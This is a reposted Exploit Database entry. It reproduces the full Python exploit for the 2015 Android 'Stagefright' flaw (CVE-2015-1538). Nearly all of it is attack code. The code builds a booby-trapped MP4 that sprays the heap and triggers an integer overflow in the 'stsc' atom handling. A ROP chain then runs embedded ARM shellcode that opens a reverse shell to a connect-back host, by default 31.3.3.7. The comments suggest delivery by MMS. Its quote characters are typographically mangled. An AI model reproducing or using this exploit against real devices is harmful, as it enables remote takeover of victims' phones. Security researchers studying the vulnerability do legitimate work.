Google Android – ‘Stagefright’ Remote Code Execution

• Exploit Database
• 10 阅读

• 作者： Joshua J. Drake
  日期： 2015-09-09
• 类别：

  • remote
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/38124/

• #!/usr/bin/env python
  # Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
  # Shout outs to our friends at Optiv (formerly Accuvant Labs)
  # (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
  # www.zimperium.com
  #
  # Exploit for RCE Vulnerability CVE-2015-1538 #1
  # Integer Overflow in the libstagefright MP4 ‘stsc’ atom handling
  #
  # Don’t forget, the output of “create_mp4” can be delivered many ways!
  # MMS is the most dangerous attack vector, but not the only one…
  #
  # DISCLAIMER: This exploit is for testing and educational purposes only. Any
  # other usage for this code is not allowed. Use at your own risk.
  #
  # “With great power comes great responsibility.” – Uncle Ben
  #
  import struct
  import socket
  #
  # Creates a single MP4 atom – LEN, TAG, DATA
  #
  def make_chunk(tag, data):
   if len(tag) != 4:
   raise ‘Yo! They call it “FourCC” for a reason.’
   ret = struct.pack(‘>L’, len(data) + 8)
   ret += tag
   ret += data
   return ret
  #
  # Make an ‘stco’ atom – Sample Table Chunk Offets
  #
  def make_stco(extra=”):
   ret =struct.pack(‘>L’, 0) # version
   ret += struct.pack(‘>L’, 0) # mNumChunkOffsets
   return make_chunk(‘stco’, ret+extra)
  #
  # Make an ‘stsz’ atom – Sample Table Size
  #
  def make_stsz(extra=”):
   ret =struct.pack(‘>L’, 0) # version
   ret += struct.pack(‘>L’, 0) # mDefaultSampleSize
   ret += struct.pack(‘>L’, 0) # mNumSampleSizes
   return make_chunk(‘stsz’, ret+extra)
  #
  # Make an ‘stts’ atom – Sample Table Time-to-Sample
  #
  def make_stts():
   ret =struct.pack(‘>L’, 0) # version
   ret += struct.pack(‘>L’, 0) # mTimeToSampleCount
   return make_chunk(‘stts’, ret)
  #
  # This creates a single Sample Table Sample-to-Chunk entry
  #
  def make_stsc_entry(start, per, desc):
   ret = ”
   ret += struct.pack(‘>L’, start + 1)
   ret += struct.pack(‘>L’, per)
   ret += struct.pack(‘>L’, desc)
   return ret
  #
  # Make an ‘stsc’ chunk – Sample Table Sample-to-Chunk
  #
  # If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and
  # cause a heap overflow.
  #
  def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):
   ret =struct.pack(‘>L’, 0) # version/flags
   # this is the clean version…
   if not do_overflow:
   ret += struct.pack(‘>L’, num_alloc) # mNumSampleToChunkOffsets
   ret += ‘Z’ * (12 * num_alloc)
   return make_chunk(‘stsc’, ret)
  
   # now the explicit version. (trigger the bug)
   ret += struct.pack(‘>L’, 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets
   # fill in the entries that will overflow the buffer
   for x in range(0, num_write):
   ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)
  
   ret = make_chunk(‘stsc’, ret)
  
   # patch the data_size
   ret = struct.pack(‘>L’, 8 + 8 + (num_alloc * 12)) + ret[4:]
  
   return ret
  
  #
  # Build the ROP chain
  #
  # ROP pivot by Georg Wicherski! Thanks!
  #
  “””
  (gdb) x/10i __dl_restore_core_regs
  0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34
  0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5}
  0xb0002858 <__dl_restore_core_regs+8>: push{r3, r4, r5}
  0xb000285c <__dl_restore_core_regs+12>:ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}
  0xb0002860 <__dl_restore_core_regs+16>:ldm sp, {sp, lr, pc}
  “””
  “””
  b0001144 <__dl_mprotect>:
  b0001144: e92d0090push{r4, r7}
  b0001148: e3a0707dmov r7, #125; 0x7d
  b000114c: ef000000svc 0x00000000
  b0001150: e8bd0090pop {r4, r7}
  b0001154: e1b00000movsr0, r0
  b0001158: 512fff1ebxpllr
  b000115c: ea0015ccb b0006894 <__dl_raise+0x10>
  “””
  def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):
   rop = ”
   rop += struct.pack(‘<L’, sp_addr + off + 0x10) # new sp
   rop += struct.pack(‘<L’, 0xb0002a98) # new lr – pop {pc}
   rop += struct.pack(‘<L’, 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc}
  
   rop += struct.pack(‘<L’, sp_addr & 0xfffff000) # new r0 – base address (page aligned)
   rop += struct.pack(‘<L’, 0x1000) # new r1 – length
   rop += struct.pack(‘<L’, 7)# new r2 – protection
   rop += struct.pack(‘<L’, 0xd000d003) # new r3 – scratch
   rop += struct.pack(‘<L’, 0xd000d004) # new r4 – scratch
   rop += struct.pack(‘<L’, 0xb0001144) # new pc – _dl_mprotect
  
   native_start = sp_addr + 0x80
   rop += struct.pack(‘<L’, native_start) # address of native payload
   #rop += struct.pack(‘<L’, 0xfeedfed5)# top of stack…
   # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)
   buf =”
   # fork
   buf += ‘\x02\x70\xa0\xe3’
   buf += ‘\x00\x00\x00\xef’
   # continue if not parent…
   buf += ‘\x00\x00\x50\xe3’
   buf += ‘\x02\x00\x00\x0a’
   # exit parent
   buf += ‘\x00\x00\xa0\xe3’
   buf += ‘\x01\x70\xa0\xe3’
   buf += ‘\x00\x00\x00\xef’
   # setsid in child
   buf += ‘\x42\x70\xa0\xe3’
   buf += ‘\x00\x00\x00\xef’
   # socket/connect/dup2/dup2/dup2
   buf += ‘\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c’
   buf += ‘\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60’
   buf += ‘\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0’
   buf += ‘\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1’
   buf += ‘\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06’
   buf += ‘\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00’
   buf += ‘\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0’
   buf += ‘\xe3\x00\x00\x00\xef’
   # execve(shell, argv, env)
   buf += ‘\x30\x00\x8f\xe2\x04\x40\x24\xe0’
   buf += ‘\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d’
   buf += ‘\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00’
   buf += ‘\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00’
   buf += ‘\xef\x02\x00’
   # Add the connect back host/port
   buf += struct.pack(‘!H’, cb_port)
   cb_host = socket.inet_aton(cb_host)
   buf += struct.pack(‘=4s’, cb_host)
   # shell –
   buf += ‘/system/bin/sh\x00\x00’
   # argv –
   buf += ‘sh\x00\x00’
   # env –
   buf += ‘PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00’
  
   # Add some identifiable stuff, just in case something goes awry…
   rop_start_off = 0x34
   x = rop_start_off + len(rop)
   while len(rop) < 0x80 – rop_start_off:
   rop += struct.pack(‘<L’, 0xf0f00000+x)
   x += 4
  
   # Add the native payload…
   rop += buf
  
   return rop
  
  #
  # Build an mp4 that exploits CVE-2015-1538 #1
  #
  # We mimic meow.3gp here…
  #
  def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
   chunks = []
  
   # Build the MP4 header…
   ftyp =‘mp42’
   ftyp += struct.pack(‘>L’, 0)
   ftyp += ‘mp42’
   ftyp += ‘isom’
   chunks.append(make_chunk(‘ftyp’, ftyp))
  
   # Note, this causes a few allocations…
   moov_data = ”
   moov_data += make_chunk(‘mvhd’,
   struct.pack(‘>LL’, 0, 0x41414141) +
   (‘B’ * 0x5c) )
  
   # Add a minimal, verified trak to satisfy mLastTrack being set
   moov_data += make_chunk(‘trak’,
   make_chunk(‘stbl’,
   make_stsc(0x28, 0x28) +
   make_stco() +
   make_stsz() +
   make_stts() ))
  
   # Spray the heap using a large tx3g chunk (can contain binary data!)
   “””
  0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4]; load mRefs
  0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0
  0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1
  0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4
  0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>:blx 0x40069884; atomic_decrement
  0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>:cmp r0, #1; must be 1
  0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>:bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
  0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>:ldr r0, [r4, #8]; load refs->mBase
  0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>:ldr r1, [r0, #0]; load mBase._vptr
  0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>:ldr r2, [r1, #12] ; load method address
  0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>:mov r1, r6
  0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>:blx r2; call it!
   “””
   page = ”
   off = 0# the offset to the next object
   off += 8
   page += struct.pack(‘<L’, sp_addr + 8 + 16 + 8 + 12 – 28)# _vptr.RefBase (for when we smash mDataSource)
   page += struct.pack(‘<L’, sp_addr + off) # mRefs
   off += 16
   page += struct.pack(‘<L’, 1) # mStrong
   page += struct.pack(‘<L’, 0xc0dedbad)# mWeak
   page += struct.pack(‘<L’, sp_addr + off) # mBase
   page += struct.pack(‘<L’, 16)# mFlags (dont set OBJECT_LIFETIME_MASK)
   off += 8
   page += struct.pack(‘<L’, sp_addr + off) # the mBase _vptr.RefBase
   page += struct.pack(‘<L’, 0xf00dbabe)# mBase.mRefs (unused)
   off += 16
   page += struct.pack(‘<L’, 0xc0de0000 + 0x00)# vtable entry 0
   page += struct.pack(‘<L’, 0xc0de0000 + 0x04)# vtable entry 4
   page += struct.pack(‘<L’, 0xc0de0000 + 0x08)# vtable entry 8
   page += struct.pack(‘<L’, newpc_val)# vtable entry 12
   rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
   x = len(page)
   while len(page) < 4096:
   page += struct.pack(‘<L’, 0xf0f00000+x)
   x += 4
  
   off = 0x34
   page = page[:off] + rop + page[off+len(rop):]
   spray = page * (((2*1024*1024) / len(page)) – 20)
   moov_data += make_chunk(‘tx3g’, spray)
   block = ‘A’ * 0x1c
   bigger = ‘B’ * 0x40
   udta = make_chunk(‘udta’,
   make_chunk(‘meta’,
   struct.pack(‘>L’, 0) +
   make_chunk(‘ilst’,
   make_chunk(‘cpil’,make_chunk(‘data’, struct.pack(‘>LL’, 21, 0) + ‘A’)) +
   make_chunk(‘trkn’,make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABBBB’)) +
   make_chunk(‘disk’,make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABB’)) +
   make_chunk(‘covr’,make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 +
   make_chunk(‘\xa9alb’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
   make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
   make_chunk(‘aART’,make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
   make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
   make_chunk(‘\xa9nam’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
   make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +
   make_chunk(‘gnre’,make_chunk(‘data’, struct.pack(‘>LL’, 1, 0) + block)) +
   make_chunk(‘covr’,make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 +
   make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) +
   make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) +
   make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)))
   )
   )
   moov_data += udta
  
   # Make the nasty trak
   tkhd1 = ”.join([
   ‘\x00’, # version
   ‘D’ * 3,# padding
   ‘E’ * (5*4),# {c,m}time, id, ??, duration
   ‘F’ * 0x10, # ??
   struct.pack(‘>LLLLLL’,
   0x10000,# a00
   0,# a01
   0,# dx
   0,# a10
   0x10000,# a11
   0), # dy
   ‘G’ * 0x14
   ])
  
   trak1 = ”
   trak1 += make_chunk(‘tkhd’, tkhd1)
  
   mdhd1 = ”.join([
   ‘\x00’, # version
   ‘D’ * 0x17, # padding
   ])
  
   mdia1 = ”
   mdia1 += make_chunk(‘mdhd’, mdhd1)
   mdia1 += make_chunk(‘hdlr’, ‘F’ * 0x3a)
  
   dinf1 = ”
   dinf1 += make_chunk(‘dref’, ‘H’ * 0x14)
  
   minf1 = ”
   minf1 += make_chunk(‘smhd’, ‘G’ * 0x08)
   minf1 += make_chunk(‘dinf’, dinf1)
  
   # Build the nasty sample table to trigger the vulnerability here.
   stbl1 = make_stsc(3, (0x1200 / 0xc) – 1, sp_addr, True) # TRIGGER
  
   # Add the stbl to the minf chunk
   minf1 += make_chunk(‘stbl’, stbl1)
  
   # Add the minf to the mdia chunk
   mdia1 += make_chunk(‘minf’, minf1)
  
   # Add the mdia to the track
   trak1 += make_chunk(‘mdia’, mdia1)
  
   # Add the nasty track to the moov data
   moov_data += make_chunk(‘trak’, trak1)
  
   # Finalize the moov chunk
   moov = make_chunk(‘moov’, moov_data)
   chunks.append(moov)
  
   # Combine outer chunks together and voila.
   data = ”.join(chunks)
  
   return data
  
  if __name__ == ‘__main__’:
   import sys
   import mp4
   import argparse
  
   def write_file(path, content):
   with open(path, ‘wb’) as f:
   f.write(content)
  
   def addr(sval):
   if sval.startswith(‘0x’):
   return int(sval, 16)
   return int(sval)
  
   # The address of a fake StrongPointer object (sprayed)
   sp_addr = 0x41d00010# takju @ imm76i – 2MB (via hangouts)
  
   # The address to of our ROP pivot
   newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs
  
   # Allow the user to override parameters
   parser = argparse.ArgumentParser()
   parser.add_argument(‘-c’, ‘–connectback-host’, dest=‘cbhost’, default=‘31.3.3.7’)
   parser.add_argument(‘-p’, ‘–connectback-port’, dest=‘cbport’, type=int, default=12345)
   parser.add_argument(‘-s’, ‘–spray-address’, dest=‘spray_addr’, type=addr, default=None)
   parser.add_argument(‘-r’, ‘–rop-pivot’, dest=‘rop_pivot’, type=addr, default=None)
   parser.add_argument(‘-o’, ‘–output-file’, dest=‘output_file’, default=‘cve-2015-1538-1.mp4’)
   args = parser.parse_args()
  
   if len(sys.argv) == 1:
   parser.print_help()
   sys.exit(–1)
  
   if args.spray_addr == None:
   args.spray_addr = sp_addr
   if args.rop_pivot == None:
   args.rop_pivot = newpc_val
  
   # Build the MP4 file…
   data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
   print(‘[*] Saving crafted MP4 to %s …’ % args.output_file)
   write_file(args.output_file, data) - See more at: https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/#sthash.MbvoiMxd.dpuf